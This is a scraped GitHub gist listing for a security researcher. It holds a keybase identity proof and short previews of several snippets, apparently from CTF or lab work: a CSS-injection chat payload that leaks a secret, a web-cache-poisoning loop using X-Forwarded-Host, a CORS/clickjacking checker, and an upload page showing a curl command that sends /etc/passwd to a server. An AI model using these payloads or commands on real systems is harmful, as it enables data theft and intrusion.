I hereby claim:
- I am LuD1161 on github.
- I am aseemshrey (https://keybase.io/aseemshrey) on keybase.
- I have a public key whose fingerprint is 67B7 7F3A F3DA 6ACB 5662 6391 A7AE 09D5 4F0E C798
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Hi ~ This is a gist !
# -*- coding: utf-8 -*- | |
char_al_num = '0123456789abcdefghijklmnopqrstuvwxyz' | |
char_Al = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' | |
char_spl = '!"#$%&\'()*+,-./:;<=>?@^_`{|}~ ' | |
char_Al += char_spl | |
put_secret_in_chat = "/name leaker ] {color:blue; background:url(/room/3fa91dea-2fc6-4e0f-a614-8243c50e62d8/send?name=admin&msg=/secret abc; Domain=somecompany.co.uk);} " | |
def generate_payload(new_char_returned_by_admin): |
// Set name | |
let color = ['brown', 'black', 'yellow', 'white', 'grey', 'red'][Math.floor(Math.random()*6)]; | |
let breed = ['ragamuffin', 'persian', 'siamese', 'siberian', 'birman', 'bombay', 'ragdoll'][Math.floor(Math.random()*7)]; | |
if (!localStorage.name) localStorage.name = color + '_' + breed; | |
// Utility functions | |
let cookie = (name) => (document.cookie.match(new RegExp(`(?:^|; )${name}=(.*?)(?:$|;)`)) || [])[1]; | |
let esc = (str) => str.replace(/</g, '<').replace(/>/g, '>').replace(/"/g, '"').replace(/'/g, '''); | |
// Sending messages |
# SSH Tunnelling | |
https://www.digitalocean.com/community/tutorials/how-to-route-web-traffic-securely-without-a-vpn-using-a-socks-tunnel | |
ssh -D 8123 -f -C -q -N sammy@example.com | |
# For decompiling to source files from webpack's compiled bundle, if you have the map | |
https://github.com/paazmaya/shuji or forked one here ( https://github.com/LuD1161/shuji ) | |
To get the source map usually append .map at the end of .js urls like : | |
https://company.com/app.b12fec8.js so map would be at https://company.com/app.b12fec8.js.map |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"/> | |
<title>CORS and Clickjacking checker</title> | |
<style> | |
body { | |
font-family: Arial; | |
color: white; | |
} |
""" | |
A horrible script, however gets things done ;) | |
USE CASE : If file encrypted with simple xor | |
Enter expected key, can be file format's hex | |
It will automatically find the key based on that header | |
And write out a new file out of it | |
""" |
from time import sleep | |
import requests | |
import webbrowser | |
X_Forwarded_Host = 'my_server' | |
while True: | |
resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) | |
print resp.headers | |
sleep(0.5) |
var token = null; | |
Promise.all([ | |
fetch('/api/movies').then(r=>r.json()), | |
fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()), | |
new Promise((resolve) => { | |
if (window.loaded_recapcha === true) | |
return resolve(); | |
window.loaded_recapcha = resolve; | |
}), |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Upload your files</title> | |
</head> | |
<body> | |
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1> | |
<h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2> | |
<form enctype="multipart/form-data" method="POST"> | |
<p>Upload your file</p> |